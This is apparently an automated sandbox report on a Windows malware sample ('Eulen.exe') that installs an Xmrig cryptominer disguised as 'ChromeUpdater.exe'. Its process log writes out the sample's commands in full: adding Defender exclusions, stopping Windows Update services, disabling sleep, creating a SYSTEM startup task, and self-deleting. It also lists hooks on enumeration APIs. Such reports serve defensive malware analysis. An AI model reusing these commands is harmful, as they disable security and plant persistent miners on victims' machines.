                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:05:28:21
                                                                              Start date:08/11/2024
                                                                              Path:C:\Users\user\Desktop\Eulen.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\Eulen.exe"
                                                                              Imagebase:0x7ff6de660000
                                                                              File size:44'977'152 bytes
                                                                              MD5 hash:F8DD965FE02F49C93F22972470D480B3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:05:28:29
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                              Imagebase:0x7ff6cb6b0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:05:28:29
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                              Imagebase:0x7ff722520000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop UsoSvc
                                                                              Imagebase:0x7ff720fa0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop WaaSMedicSvc
                                                                              Imagebase:0x7ff720fa0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop wuauserv
                                                                              Imagebase:0x7ff720fa0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop bits
                                                                              Imagebase:0x7ff720fa0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop dosvc
                                                                              Imagebase:0x7ff720fa0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff722520000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\dialer.exe
                                                                              Imagebase:0x7ff75c730000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                              Imagebase:0x7ff6cb6b0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff707d00000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff707d00000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:05:28:33
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:winlogon.exe
                                                                              Imagebase:0x7ff6cc5a0000
                                                                              File size:906'240 bytes
                                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:20
                                                                              Start time:05:28:34
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powercfg /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff707d00000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:21
                                                                              Start time:05:28:34
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powercfg /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff707d00000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:05:28:34
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\lsass.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                              Imagebase:0x7ff6b5fa0000
                                                                              File size:59'456 bytes
                                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:23
                                                                              Start time:05:28:35
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:24
                                                                              Start time:05:28:36
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\dwm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"dwm.exe"
                                                                              Imagebase:0x7ff7751a0000
                                                                              File size:94'720 bytes
                                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:26
                                                                              Start time:05:28:39
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:27
                                                                              Start time:05:28:39
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:28
                                                                              Start time:05:28:40
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:29
                                                                              Start time:05:28:40
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:30
                                                                              Start time:05:28:40
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:31
                                                                              Start time:05:28:41
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:32
                                                                              Start time:05:28:41
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:33
                                                                              Start time:05:28:42
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:34
                                                                              Start time:05:28:44
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:37
                                                                              Start time:05:28:44
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"
                                                                              Imagebase:0x7ff722520000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:38
                                                                              Start time:05:28:44
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:39
                                                                              Start time:05:28:45
                                                                              Start date:08/11/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
                                                                              Imagebase:0x7ff606d30000
                                                                              File size:44'977'152 bytes
                                                                              MD5 hash:F8DD965FE02F49C93F22972470D480B3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 16%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:40
                                                                              Start time:05:28:44
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\choice.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:choice /C Y /N /D Y /T 3
                                                                              Imagebase:0x7ff7a7cc0000
                                                                              File size:35'840 bytes
                                                                              MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:41
                                                                              Start time:05:28:44
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:42
                                                                              Start time:05:28:45
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:43
                                                                              Start time:05:28:46
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:44
                                                                              Start time:05:28:46
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:45
                                                                              Start time:05:28:46
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:46
                                                                              Start time:05:28:46
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:47
                                                                              Start time:05:28:47
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:48
                                                                              Start time:05:28:47
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:49
                                                                              Start time:05:28:47
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:50
                                                                              Start time:05:28:48
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                              Imagebase:0x7ff67e6d0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:156
                                                                              Start time:05:28:56
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:165
                                                                              Start time:05:28:56
                                                                              Start date:08/11/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:48%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:66.4%
                                                                                Total number of Nodes:232
                                                                                Total number of Limit Nodes:25
